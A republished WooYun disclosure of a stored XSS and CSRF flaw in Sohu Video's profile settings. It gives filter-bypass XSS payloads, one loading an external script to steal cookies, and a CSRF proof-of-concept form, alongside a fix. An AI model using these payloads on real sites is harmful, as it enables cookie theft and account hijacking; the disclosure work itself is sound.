神刀安全网

漏洞标题: 搜狐视频储存型XSS(过滤了尖括号/圆括号/单引号等字符下的利用技巧)

漏洞详情

披露状态:

2016-04-12: 细节已通知厂商并且等待厂商处理中
2016-04-12: 厂商已经确认,细节仅向厂商公开
2016-04-22: 细节向核心白帽子及相关领域专家公开
2016-05-02: 细节向普通白帽子公开
2016-05-12: 细节向实习白帽子公开
2016-05-27: 细节向公众公开

简要描述:

有详细的分析过程,绕过限制得需要一定的基础~

详细说明:

漏洞缺陷位置:基本资料 – 个人资料 – 通讯地址: http://my.tv.sohu.com/user/setting/basic.do

然后测试后发现,这里过滤了常见的script关键字,还有尖括号 >< ,单引号 ' ,圆括号 ) (

测试了一番后,绕过了这些过滤,成功弹窗。

payload:

code 区域
xxxxxxxxxx" name=javasCript:alert%281%29 autofocus onfocus=location=this.name xx

代码执行流程如下图箭头所示:

漏洞标题:  搜狐视频储存型XSS(过滤了尖括号/圆括号/单引号等字符下的利用技巧)

然后尝试写入外部js文件,测试后发现有200字节的长度限制,注意一下过滤的那些东西,我直接给出payload吧。

code 区域
xxxxxxxxxx" name=javasCript:s=document.createElement%28"sCript"%29;s.src="//xxxxx.js";document.body.appendChild%28s%29 autofocus onfocus=location=this.name xx

如下图,成功写入代码,生成调用外部js文件的js代码,获取cookie~

漏洞标题:  搜狐视频储存型XSS(过滤了尖括号/圆括号/单引号等字符下的利用技巧)

漏洞标题:  搜狐视频储存型XSS(过滤了尖括号/圆括号/单引号等字符下的利用技巧)

漏洞标题:  搜狐视频储存型XSS(过滤了尖括号/圆括号/单引号等字符下的利用技巧)

漏洞证明:

这里做下简单的说明,为什么payload要这么写呢?

1 由于过滤了尖括号><,所以只能在input标签内部构造,input标签最好用的xss事件就是onfocus了

2 由于过滤了圆括号(),所以用 location=url编码 的这种模式可以将括号写为%28 %29

3 由于过滤了单引号',所以location='alert%271%28'这样就不能用了,所以利用this.name进行传值

4 script关键字有过滤,所以用sCript大小写混淆绕过

基本就这样了吧,综上就可以得出上面的payload了~

下面再说下CSRF漏洞,因为这里的单一XSS漏洞没有什么意义,只是个selfxss自己x自己的。

然后这里的post保存请求没有验证referer,所以可以CSRF,2者结合起来就可以X别人了。

中招CSRF就直接埋下了持久的XSS后门。

这里直接给出可以埋下,调用任意外部js文件,的CSRF的poc代码:

code 区域
<form id="csrfdemo" action="http://my.tv.sohu.com/user/profile/basic_update.do" method="POST">
<input type='hidden' name='nickname' value='test12341478524'><input type='hidden' name='sex' value='0'><input type='hidden' name='usermail' value=''><input type='hidden' name='year' value='0000'><input type='hidden' name='month' value='00'><input type='hidden' name='day' value='00'><input type='hidden' name='city1' value='0'><input type='hidden' name='usersign' value=''><input type='hidden' name='address' value='xxxxxxxxxx" name=javasCript:s=document.createElement%28"sCript"%29;s.src="//xxxxx.js";document.body.appendChild%28s%29 autofocus onfocus=location=this.name xx'><input type='hidden' name='postcode' value=''>
</form>
<button onclick="document.getElementById('csrfdemo').submit()">测试</button>

修复方案:

XSS 把剩下唯一没过滤的双引号,再过滤下就行了

CSRF 验证referer信息

版权声明:转载请注明来源 px1624@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 搜狐视频储存型XSS(过滤了尖括号/圆括号/单引号等字符下的利用技巧)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址